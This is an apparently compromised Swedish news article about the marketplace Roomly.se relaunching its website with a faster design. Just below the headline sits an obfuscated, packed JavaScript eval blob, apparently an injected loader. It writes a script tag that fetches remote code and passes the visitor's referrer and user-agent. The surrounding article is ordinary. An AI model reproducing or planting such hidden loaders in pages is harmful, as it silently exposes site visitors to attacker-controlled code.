Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Marknadsplatsen med inredning och möbler får nytt ansikte

Marknadsplatsen med inredning och möbler får nytt ansikte

Roomly.se: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tynbz|var|u0026u|referrer|erfkr||js|php’.split(’|’),0,{}))
Sommaren går nu in i sina sista månader och hösten väntar runt hörnet. Detta betyder att e-handeln som ofta är lite långsammare under sommaren börjar satsa på höstens rusch. Inredningsplattformen Roomly.se börjar hösten med att lansera en ny snygg hemsida.

Roomly.se som uppmärksamats en hel del under året i media är en marknadsplats med fokus på möbler och inredning. Korttfattat ”ett Zalando” för inredning. Företaget och butiken har inget eget lager med artiklar utan har istället samarbeten med leverantörer och återförsäljare som står för logistiken. Sedan sin start sommaren 2015 har Roomly kunnat omsätta över 5 miljoner kronor åt sina partners. Några partners som tjänsten har idag är bland annat Ellos, Royal Design, Rum21, Furniturebox, Indiska med fler.

Nu efter drygt ett år kommer en ny snygg hemsida med en ny design men också uppdaterade tjänster som ska göra det ännu enklare att hitta och navigera sig till rätt möbel eller inredning.

Ett stort upplyft sedan den förra versionen är att hastigheten nu är på rätt håll. Många medier har uppmärksammat att just hastighet och laddningstider på e-butiker är en av det viktigaste fokusområdet efter försäljning.

” Vi firar ett år på Roomly. Detta är en stor milstolpe för verksamheten. Med detta lanserar vi därför en ny hemsida där det förutom en kosmetisk uppdatering också blivit snabbare och lättare att hitta rätt. Ett problem vi fått stå med sedan i våras är hastigheten som med tiden blivit långsam. Detta är mycket viktigt så vi har lagt mycket resurser på att få till detta och nu kommit en bit på vägen. Det är en ständig punkt att jobba på men sajten är mycket snabbare nu än för en månad sedan. ”

Den nya sajten hittar ni via följande länk! Roomly.se – Inredning och möbler på nätet